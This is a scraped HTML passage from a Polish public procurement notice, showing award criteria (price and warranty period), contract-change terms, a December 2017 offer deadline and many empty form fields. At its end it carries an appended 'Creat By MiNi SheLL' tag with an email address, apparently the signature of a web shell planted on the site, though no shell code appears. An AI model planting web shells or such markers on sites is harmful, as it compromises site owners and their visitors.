id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Dopuszczalne zmiany umowy nastąpić mogą zgodnie z okolicznościami przewidzianymi w art. 144 ustawy Pzp.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-12-07</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">pl</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com